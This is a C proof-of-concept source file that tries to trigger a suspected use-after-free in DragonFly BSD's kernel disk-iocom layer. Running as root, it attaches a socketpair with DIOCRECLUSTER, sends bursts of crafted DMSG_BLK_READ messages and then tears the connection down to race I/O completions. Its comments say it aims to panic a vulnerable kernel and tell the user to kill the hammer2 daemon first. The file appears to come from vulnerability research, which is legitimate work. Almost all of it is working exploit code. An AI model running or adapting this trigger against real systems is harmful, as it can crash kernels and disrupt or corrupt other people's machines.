/*
 * DF-0117 PoC (self-contained trigger) -- attempt to reproduce the alleged
 * UAF on kdmsg_state in diskiodone (sys/kern/subr_diskiocom.c:580/582/650).
 *
 * Claim under test (finding DF-0117):
 *   In disk_blk_read/write/flush/freeblks the kdmsg state pointer is stored
 *   in bio->bio_caller_info1.ptr and dispatched to dev_dstrategy() async,
 *   but NO reference is taken on the state (kdmsg_state_hold() is commented
 *   out at subr_diskiocom.c:375/451/503/554, drop at :661).  If the kdmsg
 *   peer sends DELETE or the connection drops while I/O is in flight, the
 *   kdmsg core frees the state; when diskiodone fires on completion it
 *   dereferences the freed state (:580/:582/:650) -> UAF.
 *
 * Setup solved (reused from sibling finding DF-0017):
 *   A DMSG iocom fd is attached to the kernel disk-iocom parser by opening
 *   a raw disk device node and issuing DIOCRECLUSTER (sys/sys/diskslice.h)
 *   with one end of an AF_UNIX socketpair.  We then drive wire DMSG messages
 *   on the other end.  The hammer2 userland daemon pre-connects every disk
 *   iocom at boot via DIOCRECLUSTER and would deadlock a follow-on reconnect,
 *   so run.sh does `pkill -9 -x hammer2` first to free the disk iocom.
 *
 * Strategy (single-shot per process to avoid the reconnect deadlock):
 *   1. Establish the iocom ONCE (open /dev/vbd0, socketpair, DIOCRECLUSTER).
 *   2. Send a large burst of DMSG_BLK_READ|CREATE[|DELETE] messages, each
 *      dispatching a real async disk I/O on the root disk via dev_dstrategy,
 *      storing bio->bio_caller_info1.ptr = msg->state with NO state hold.
 *   3. Race the I/O completions against state teardown: optionally send
 *      explicit DELETE on every state, then close the socket -> reader EOF
 *      -> writer-thread teardown -> kdmsg_simulate_failure(state0) walks +
 *      aborts + frees all states.
 *      If the UAF is real, a diskiodone dereferences a freed kdmsg_state_t
 *      and the INVARIANTS kernel panics (KKASSERT in kdmsg_state_free or a
 *      page fault on freed slab memory).
 *   4. Wait for the teardown to drain, then exit.  run.sh re-runs with a
 *      guest reset between variants.
 *
 * Build (DragonFly, any user):
 *   cc -O2 -o trigger trigger.c -lpthread
 *
 * Run (as ROOT -- needs /dev/vbd0 + DIOCRECLUSTER):
 *   ./trigger [nreads] [mode] [preclose_us]
 *     nreads        default 256
 *     mode          0 = CREATE only (eof=0)
 *                   1 = CREATE|DELETE (eof=1)
 *                   2 = CREATE then explicit DELETE msg on each state
 *     preclose_us   default 2000 (delay between burst and socket close)
 *
 * Expected (bug present): kernel panic in diskiodone / kdmsg_state_free /
 *   page fault on freed kdmsg_state_t memory (captured in boot.log).
 * Expected (state protected by topology refs): trigger exits cleanly,
 *   guest stays up, dmesg clean.
 *
 * WARNING: may panic a vulnerable kernel.  Run only on a disposable VM.
 */

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/diskslice.h>	/* DIOCRECLUSTER, struct disk_ioc_recluster */
#include <sys/dmsg.h>
#include <sys/socket.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <err.h>

#define DMSG_DISK	"/dev/vbd0"

/* dmsg base wire header is 64 bytes; BLK_READ extended header is 128 bytes
 * (SIZE field = 2, hbytes = 2*64 per kern_dmsg.c:348).  Only the first 32
 * bytes after the base head carry blk_read fields; the rest is padding the
 * reader still consumes.  We send the full 128. */
#define BLK_READ_HDR_BYTES	128

struct blk_read_wire {
	dmsg_hdr_t		hdr;		/* 64 bytes */
	uint64_t		keyid;		/* +0x40 */
	uint64_t		offset;		/* +0x48 */
	uint32_t		bytes;		/* +0x50 */
	uint32_t		flags;		/* +0x54 */
	uint32_t		reserved01;	/* +0x58 */
	uint32_t		reserved02;	/* +0x5c */
	unsigned char		pad[32];	/* +0x60 .. +0x7f (reader reads 128) */
} __attribute__((packed));

/* Build a BLK_READ wire message.  cmd is DMSG_BLK_READ possibly OR'd with
 * DMSGF_CREATE / DMSGF_DELETE.  msgid identifies the transaction; circuit
 * selects the parent state (0 == state0 == top-level transaction). */
static void
mk_blk_read(void *buf, uint32_t cmd, uint64_t msgid, uint64_t circuit,
    uint64_t offset, uint32_t bytes)
{
	struct blk_read_wire *w = buf;
	memset(buf, 0, BLK_READ_HDR_BYTES);
	w->hdr.magic = DMSG_HDR_MAGIC;		/* 0x4832 */
	w->hdr.msgid = msgid;
	w->hdr.circuit = circuit;
	w->hdr.cmd = cmd;			/* already carries SIZE field */
	w->hdr.aux_bytes = 0;
	w->hdr.aux_crc = 0;
	w->hdr.hdr_crc = 0;			/* receive path does not verify */
	w->keyid = 0;
	w->offset = offset;
	w->bytes = bytes;
}

/* Drain thread: read & discard whatever the kernel writes back (LNK_CONN,
 * BLK_ERROR replies, LNK_PING...) so the socket send buffer never fills and
 * deadlocks the kernel's writer thread. */
static void *
drain(void *arg)
{
	int fd = *(int *)arg;
	char buf[8192];
	for (;;)
		if (read(fd, buf, sizeof(buf)) <= 0)
			break;
	return NULL;
}

int
main(int argc, char **argv)
{
	setvbuf(stderr, NULL, _IONBF, 0);
	int nreads     = (argc > 1) ? atoi(argv[1]) : 256;
	int mode       = (argc > 2) ? atoi(argv[2]) : 0;
	int preclose_us= (argc > 3) ? atoi(argv[3]) : 2000;
	if (nreads < 1) nreads = 1;

	int diskfd = open(DMSG_DISK, O_RDWR);
	if (diskfd < 0)
		err(1, "open %s (need root/operator for DIOCRECLUSTER)", DMSG_DISK);
	fprintf(stderr, "[*] opened %s fd=%d; nreads=%d mode=%d\n",
	    DMSG_DISK, diskfd, nreads, mode);

	int sv[2];
	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
		err(1, "socketpair");
	int sv_kern = sv[0], sv_us = sv[1];

	pthread_t dt;
	pthread_create(&dt, NULL, drain, &sv_us);

	struct disk_ioc_recluster recl;
	memset(&recl, 0, sizeof(recl));
	recl.fd = sv_kern;
	if (ioctl(diskfd, DIOCRECLUSTER, &recl) < 0)
		err(1, "DIOCRECLUSTER");
	fprintf(stderr, "[1] DIOCRECLUSTER ok (sv_kern=%d sv_us=%d)\n",
	    sv_kern, sv_us);

	char buf[BLK_READ_HDR_BYTES];
	uint32_t basecmd = DMSG_BLK_READ;			/* 0x00500302 */
	uint32_t create_flags;
	switch (mode) {
	case 1:  create_flags = DMSGF_CREATE | DMSGF_DELETE; break;	/* eof=1 */
	case 2:  create_flags = DMSGF_CREATE; break;			/* DEL later */
	default: create_flags = DMSGF_CREATE; break;			/* eof=0 */
	}

	/* dispatch a burst of reads -- each CREATE makes a new kdmsg state and
	 * dispatches one async disk I/O that stores a raw state pointer with
	 * NO state hold. */
	for (int i = 0; i < nreads; i++) {
		uint64_t msgid = (uint64_t)(i + 1);
		mk_blk_read(buf, basecmd | create_flags, msgid, 0, 0, 512);
		ssize_t w = write(sv_us, buf, BLK_READ_HDR_BYTES);
		if (w != BLK_READ_HDR_BYTES)
			warn("write BLK_READ i=%d rv=%zd", i, w);
	}
	fprintf(stderr, "[2] wrote %d BLK_READ|CREATE messages\n", nreads);

	if (mode == 2) {
		/* send explicit DELETE on each state to drive rxcmd |= DELETE
		 * (and another round of I/O dispatch) before teardown */
		for (int i = 0; i < nreads; i++) {
			uint64_t msgid = (uint64_t)(i + 1);
			mk_blk_read(buf, basecmd | DMSGF_DELETE, msgid, 0, 0, 512);
			write(sv_us, buf, BLK_READ_HDR_BYTES);
		}
		fprintf(stderr, "[2a] wrote %d BLK_READ|DELETE messages\n", nreads);
	}

	/* let some I/Os land in flight, then tear the connection down --
	 * races diskiodone vs writer-thread kdmsg_simulate_failure teardown */
	usleep(preclose_us);

	fprintf(stderr, "[3] closing sv_us -> reader EOF -> teardown race\n");
	close(sv_us);
	sv_us = -1;

	/* give the writer teardown loop (hz/2 sleeps) plenty of time to drain
	 * all states through diskiodone */
	fprintf(stderr, "[4] waiting 4s for teardown to complete...\n");
	sleep(4);

	/* drain thread exits when its socket end closed */
	pthread_join(dt, NULL);

	fprintf(stderr,
	    "[done] %d reads dispatched; no panic observed by userspace\n",
	    nreads);
	close(diskfd);
	return 0;
}
